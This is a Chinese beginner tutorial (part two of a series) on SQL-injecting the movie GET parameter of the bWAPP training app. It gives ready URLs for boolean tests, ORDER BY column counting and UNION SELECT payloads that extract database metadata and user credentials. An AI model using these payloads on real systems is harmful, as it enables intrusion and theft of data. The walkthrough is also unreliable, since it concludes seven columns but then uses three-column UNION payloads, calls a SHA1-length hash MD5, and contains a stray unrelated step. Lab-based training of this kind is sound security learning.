渗透入门之SQL 注入(二）

重要声明

SQL注入实验仅可在自己搭建的合法测试环境（如本地虚拟机、授权的测试服务器）中进行，严禁对任何非授权系统实施测试，否则可能违反《网络安全法》等法律法规，需承担相应法律责任。

接上一篇渗透入门之SQL 注入(一）

SQL Injection (GET/Select)：GET请求数据查询类注入

BWAPP的SQL Injection (GET/Select)漏洞属于下拉选择框驱动的GET参数注入，核心特征是页面通过下拉选单（如选择国家/地区、类别等）提交GET参数（典型参数名：movie），参数通常关联数据库的主键/索引字段，易触发数字型（或字符型）SQL注入。与Search类注入的核心区别：注入点是下拉选单对应的ID类GET参数，而非搜索框的字符串参数，测试逻辑需适配数字型注入特征。

（ 1 ） 步骤1：进入漏洞页面

• 访问BWAPP首页（如http://192.168.0.100/bwapp），使用默认账号bee、密码bug登录；
• 在"Choose your bug"下拉框中选择SQL Injection (GET/Select)，点击Hack按钮进入漏洞页面；
• 观察页面特征：

• 页面显示"Select a movie"下拉选择框
• 选择任意选项，点击提交，URL自动变为：http://192.168.0.100/bwapp/sqli_2.php?movie=2\&action=go
• 核心结论：movie是GET注入参数，目标是对该参数进行注入测试。

(2) 步骤2：判断注入点类型及存在性

目标：确认movie参数是否存在注入，以及注入类型（数字型/字符型）。

测试1：数字型注入验证

• 正常请求：
• 正常请求：http://192.168.0.100/bwapp/sqli_2.php?movie=2\&action=go → 页面显示movie相关数据；

• http://192.168.0.100/bwapp/sqli_2.php?id=1\&action=go → 页面显示France相关数据；
• 逻辑真测试：http://192.168.0.100/bwapp/sqli_2.php?movie=2 and 2=2&action=go→ 页面正常（与++++movie++++ ++++=++++ ++++2++++结果一致）；

• 逻辑假测试：http://192.168.0.100/bwapp/sqli_2.php?movie=2 and 2=3&action=go→ 页面无数据（原查询条件不成立）；

• 结论：movie参数存在数字型SQL注入。

(3) 步骤3：判断后台查询的字段数（ORDER BY）

目标：确定后台SQL查询的字段数量，为联合查询铺垫。

构造URL（逐步增加ORDER BY后的数字，直到报错）：

• http://192.168.0.100/bwapp/sqli_2.php?movie=2 ORDER BY 2&action=go → 页面正常；

• http://192.168.0.100/bwapp/sqli_2.php?movie=2 ORDER BY 8&action=go → 报错

结论：后台SQL查询的字段数为7。

（4）步骤4：联合查询找"显位"（可显示数据的列）

目标：让原查询无结果，强制显示联合查询的结果，确定哪些列会在页面展示。

• 构造URL（用movie=-1让原查询无匹配结果，UNION SELECT拼接查询）：

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,2,3,4,5,6,7&action=go；

• 观察页面：数字2、3、4等会显示在页面中，说明第该列是显位（可展示注入提取的数据）。

（5）步骤5：获取数据库基础信息

利用UNION SELECT提取MySQL核心信息，替换显位为目标函数：

|--------|---------------------------------------------------------------------------------------|--------|
| 目标信息 | 构造URL示例（数字型） | 预期结果示例 |
| 当前数据库名 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,database(),3&action=go | bwapp |

|---------|--------------------------------------------------------------------------------------|--------|
| 目标信息 | 构造URL示例（数字型） | 预期结果示例 |
| MySQL版本 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,version(),3&action=go | 5.0.96 |

|-------|-----------------------------------------------------------------------------------|------------------------------------------------|
| 目标信息 | 构造URL示例（数字型） | 预期结果示例 |
| 数据库用户 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user(),3&action=go | root@localhost |

|--------|--------------------------------------------------------------------------------------|-----------------|
| 目标信息 | 构造URL示例（数字型） | 预期结果示例 |
| 数据存储目录 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,@@datadir,3&action=go | /var/lib/mysql/ |

（6）步骤6：获取 bwapp 数据库的表名

详见渗透入门之SQL注入（一）

（7）步骤7：获取 users 表的列名

详见渗透入门之SQL注入（一）****

（8）步骤8：提取 users 表的账号密码数据

详见****渗透入门之SQL注入（一）********

页面会显示用户数据：

|----------------------|------------------------------------------|
| 显位2（由上章节用户名存在login里） | 显位3（password，MD5加密） |
| A.I.M. | 6885858486f31043e5839c735d99457f045affd0 |

解密MD5值：A.I.M.对应密码bug。

（9）步骤9：验证结果

使用提取到的用户名密码登录BWAPP，验证账号密码的有效性，确认注入结果正确。